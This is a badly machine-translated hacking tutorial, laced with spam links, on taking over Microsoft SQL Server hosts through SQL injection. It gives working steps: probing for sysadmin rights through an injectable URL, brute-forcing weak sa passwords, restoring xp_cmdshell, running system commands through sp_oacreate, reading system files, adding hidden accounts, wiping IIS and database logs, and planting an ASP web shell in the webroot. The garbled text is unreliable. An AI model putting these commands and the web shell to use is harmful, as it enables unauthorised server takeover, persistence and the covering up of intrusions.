To xp_cmdshell March-vulnerability warning-the black bar safety net


To xp_cmdshell March - Using MSSQL[Data](<http://www.3800cc.com/>)store expansion made[service](<http://www.3800cc.com/>)is the management right In MSSQL having sysadmin permission to the user through the xp_cmdshell stored extensions to the system permissions to execute arbitrary system commands, and therefore most of the security attention of the administrator will delete it, even if no deletion is also likely to be obtained due to insufficient permissions and come to naught. Therefore to get the xp_cmdshell execute permissions on it became most of the SQL Injection attack methods the ultimate goal. Me to tell you about in this process involve several key problems and their solutions. Right when is the initiate of. Get the current user permissions In MSSQL in the presence of a total of 8 kinds of permissions: sysadmin, dbcreator, diskadmin, processadmin, and serveradmin, setupadmin, securityadmin, bulkadmin it. Each permission has a different role, but also determines our success or failure. In this 8 kinds of permissions, only members of the sysadmin is we really want, and therefore only need to submit <http://somesite/show.asp?id=4864> and 1=(select IS_SRVROLEMEMBER('sysadmin')) To determine whether the current user has sysadmin permissions. If the return to the normal words that congratulations, today lottery for sure winning! Otherwise, who take the eggs to throw at me.^_^) we have other methods can be used. Hack the sa account is a weak password This method should not belong to the SQL Injection category, but in our entire penetration process will often play a decisive role. Well, without further ADO, to open my most commonly used SQLScanPass, the host IP and port 1 4 3 3 write-SQLHost. Txt file, the first test of the air interface of the token, if not successful, then it hung a good dictionary, the probability of success will be greatly increased. Run the interface as shown Now we can brew a Cup of coffee slowly stop, slowly waiting. Determine the storage expansion detection If the current site used by the user is a member of the sysadmin permissions, you can use the worry beggarly method for the storage expansion of detection and recovery, it would be a lot easier. If Yes, get the sa or other account weak password while the rest of the task can be handed over to SQLTools. exe. This app is by the blue glow of the writing, which is powerful hard to imagine. But in addition to perform the[data](<http://www.3800cc.com/>)library commands are required for a certain storage expansion support, so the first thing to determine these storage expansion exists. From the"use directory"in the menu open the perform[data](<http://www.3800cc.com/>)library command window, fill in we want to execute the command. For example select count(*) from master. dbo. sysobjects where xtype='X' and name='xp_cmdshell' Used to determine whether the presence of the xp_cmdshell stored extensions, run the interface as shown If the return result is 1, then we can use the menu"execute DOS command"option. Otherwise, then we should look down. Recovery xp_cmdshell, grab broiler Directly in the[data](<http://www.3800cc.com/>)library command execution window write Exec master. dbo. addextendedproc 'xp_cmdshell', 'xplog70.dll'; select count(*) from master. dbo. sysobjects where xtype='X' and name='xp_cmdshell' If it returns 1, then it shows the recovery is successful, otherwise we need to give him Upload a xplog70. the dll file. Open the file upload window to upload the file to the C:\WinNt\System32\lower after the implementation of[the data](<http://www.3800cc.com/>)library command Exec master. dbo. addextendedproc 'xp_cmdshell', 'C:\WinNt\System32\xplog70.dll' the. OK, the rest is our everyday use of the net use and net localgroup command, as[service](<http://www.3800cc.com/>)to add a hidden account, clean up the IIS logs and the MSSQL log split. it. To bypass xp_cmdshell executes a system command In MSSQL you can through sp_oacreate and sp_oamethod two storage expansion create ActiveX[auto](<http://www.3800cc.com/>)script. Therefore the implementation of the system of the command statement can be written as: declare @o int exec sp_oacreate 'wscript. shell', @o out exec sp_oamethod @o, 'run', NULL, 'net start telnet' His role in the[service](<http://www.3800cc.com/>)to the server via wscript. shell execute net start telnet, and so on[service](<http://www.3800cc.com/>)telnet[service](<http://www.3800cc.com/ s). You will think that the FSO! Yeah, we may also use it for file management, for example: declare @o int, @f int, @t int, @ret int ,@c varchar(8 0 0 0) declare @line varchar(8 0 0 0) exec sp_oacreate 'scripting. filesystemobject', @o out exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1 exec @ret = sp_oamethod @f, 'readline', @line out select @c=" while( @ret = 0) begin select @c=@c+@line+char(1 3)+char(1 0) exec @ret = sp_oamethod @f, 'readline', @line out end 可以 读取 c:\boot.ini 文件 中的 内容 并存 储 在 局部 变量 @c 中 the. If you want to read it, you'll need to create a temporary table written on it. With this method you can also create the file, and the write[data](<http://www.3800cc.com/>), for example: declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting. filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server. createobject("wscript. shell"): o. run("cmd.exe /c "&request. querystring("cmd")) %>' In c:\inetpub\wwwroot\foo. asp created a only two lines of code the asp Trojan. This method avoids the use of backup brings a lot of useless[data](<http://www.3800cc.com/>)and using the sp_makewebtask stored extensions The create temporary table trouble. This is home travel, killing the hard disk of the essential tool. Total theory MSSQL provides us with unusually rich store extension libraries, you can complete the[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)can complete the most important functions, such as registry management, File Management, User Management, Permissions management, etc. But if there is not enough security awareness, it will give the[service](<http://www.3800cc.com/>)to bring deadly threat. Say I own are a bit afraid of afraid of: